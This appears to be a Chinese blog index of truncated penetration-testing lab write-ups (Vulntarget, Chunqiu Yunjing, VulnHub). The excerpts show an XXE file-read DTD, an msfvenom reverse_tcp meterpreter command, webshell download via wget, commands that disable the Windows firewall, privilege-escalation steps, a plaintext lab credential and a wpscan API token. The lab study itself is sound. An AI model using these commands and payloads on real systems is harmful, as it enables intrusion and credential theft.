春秋云镜-tsclient
春秋云镜-tsclientflag01
扫到了mssql的弱口令
MDUT进行连接
然后sweetpotato提权system
然后新建一个administrator权限
进行rdp登录
flag02
上线cs进行方便更好的信息搜集
fscan在扫一遍
1234(icmp) Target 172.22.8.31 is alive(icmp) Target 172.22.8.18 is alive(icmp) Target 172.22.8.15 is alive(icmp) Target 172.22.8.46 is alive
这是存活的几台机子
123发现了一个在线的john通过进程注入上线该用户
发现了一个文件,保存的为账密
1xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#
通过smbpasswd修改密码
然后再rdp进行登录
然后再利用该上线的机器进行创建listener
然后上线cs
下一步就是映像劫持提权,先查看权限:
1get-acl -path "HKLM ...
Vulntarget-f
Vulntarget-fflag01fscan一阵扫描
既然扫出有洞,那就直接拿poc打吧
https://www.hacking8.com/bug-product/Zimbra/CVE-2019-9621-CVE-2019-9670-Zimbra-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
验证xxe漏洞
读取zimbra用户账号密码首先在本地开启一个服务用来dtd文件的传输
1234<!ENTITY % file SYSTEM "file:../conf/localconfig.xml"> <!ENTITY % start "<![CDATA["> <!ENTITY % end "]]>"> <!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'> ...
Vulntarget-d
Vulntarget-dflag01fscan一阵乱扫
发现了骑士cms
跟着网上得文章复现
https://www.cnblogs.com/twlr/p/14142870.html
然后getshell,传到msf上来,这次用viper玩玩
进行提权脚本搜索
1run post/multi/recon/local_exploit_suggester
1234567# Name Potentially Vulnerable? Check Result- ---- ----------------------- ------------1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes ...
Vulntarget-c
Vulntarget-c环境搭建这里需要把ubuntu20修改一下网卡
root / root#qwe
1vim /etc/netplan/00-installer-config.yaml
把这两个改成你自己的桥接或者nat的ip(这里是我已经修改后的样子)
123netplan apply#然后在ip addr 看一下ip修改成功没
flag01fscan扫一扫
然后直接上脚本进行getshell
123git clone https://github.com/SNCKER/CVE-2021-3129cd CVE-2021-3129git clone https://github.com/ambionics/phpggc.git(exp执行需要使用此工具)
需要修改exp.py中的目标ip
最终在**/var/www/html/public**中找到了index.php
然后就是wget本地写的一句话木马
然后进行msf上线
1python -c "import pty;pty.spaw ...
Vulntarget-b
Vulntarget-b首先对端口进行扫描
1nmap -p- 192.168.0.104
很多端口,进行挨个尝试
发现80没有站点
但是81站点为极致CMS
4567的端口很明显为宝塔的默认index.html
8888端口为宝塔的进入端口
那么我们就可以从peiqi文库找CMS着手开始
1https://peiqi.wgpsec.org/wiki/cms/
123弱口令admin/admin123进入后台
跟着复现,我本地没有出现
所以直接选择在宝塔机器上写🐎
重新把环境返回了快照,所以centos的外网地址变了,不用care
蚁剑连接上进行msf拿shell
这里是被宝塔限制了危险函数,所以通过蚁剑插件进行绕过
然后进行反弹shell
msf生成木马
1msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.20.10.2 LPORT=5555 -f elf -o m3f.elf
进来后发现是www权限,于是运用msf的搜索提权模块
1run post/multi/rec ...
Vulntarget-a
Vulntarget-a
直接上工具
然后哥斯拉连接
进行whoami,发现是system权限,尝试cs上线
然后关闭防火墙
12netsh advfirewall show allprofiles statenetsh advfirewall set allprofiles state off
发现是双网卡
12172.20.10.410.0.20.98
上传fscan进行扫描
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455[11/19 10:15:32] [*] Tasked beacon to run: fscan.exe -h 10.0.20.1/24 -o out.txt[11/19 10:15:32] [+] host called home, sent: 67 bytes[11/19 10:15:42] [+] received output: ___ ...
春秋云镜-brute4road
Brute4Roadflag01fscan直接扫ip
访问80端口
开启了6379端口,进行redis漏洞的利用
然后在/home/redis/flag/发现了第一个flag01
但是没有权限读取
1find / -perm -u=s -type f 2>/dev/null
然后通过suid找到了这个可以读取flag01
1base64 flag01 | base64 -d
flag02单网卡,那就上fscan扫
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364./fscan_386 -h 172.22.2.0/24 -o out.txt ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____ ...
Fast destruct
一道题引出1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556<?php highlight_file(__FILE__);class Start{ public $errMsg; public function __destruct() { die($this->errMsg); }}class Pwn{ public $obj; public function __invoke(){ $this->obj->evil(); } public function evil() { phpinfo(); }}class Reverse{ public $func; public function __get($var) { ($this->fu ...
哈利波特2
靶场下载链接:https://www.vulnhub.com/entry/harrypotter-nagini,689/
打靶joomlanamp端口发现80
然后dirsearch
进行joomscan
1joomscan -u 172.20.10.2/joomla/
发现了.php.bak备份文件
去下载然后发现了数据库的帐号密码,但是远程连接不上去
然后我的思路就被卡住了,看了庆尘哥的WP,他还扫到了note.txt
就是通过http3访问后就可以提示到这个文件internalResourceFeTcher.php
然后就去访问
经过测试发现存在SSRF探测内网资源
SSRF+gopher打RCE12345671.下载wget http://github.com/tarunkant/Gopherus/archive/refs/heads/master.zip2.解压unzip master.zip
12345#这里需要使用py2的环境python2 gopherus.py --exploit mysqlgoblinuse joomla;show ...
哈利波特1
环境搭建靶场下载链接:https://www.vulnhub.com/entry/harrypotter-aragog-102,688/我这里使用的NAT网络kali和靶机都在10.0.2.0/24这个网段
123kali:10.0.2.15靶机:10.0.2.4
目标
找到两个flag-》horcruxes
打靶首先是Nmap端口的扫描
顺手再做一个目录爆破
没啥可利用的,那就去访问一下80吧
发现了帅气的哈利波特,然后根据字典爆破的看看blog目录
发现了wordpress,那就无脑上wpscan咯
wpscan使用的话需要token api,只需要去官网注册一个帐号即可,每天有25次的免费api(爽姊姊)
wordpress的突破1234567#检测wordpress站点的漏洞wpscan --api-token=ncpMue7yoUJi54sMafxWaHh4ntwFTTwQWCadedVv6sQ --url=http://172.21.122.235/blog #检测wordpress站点所用插件的漏洞wpscan --api-token=ncpMu ...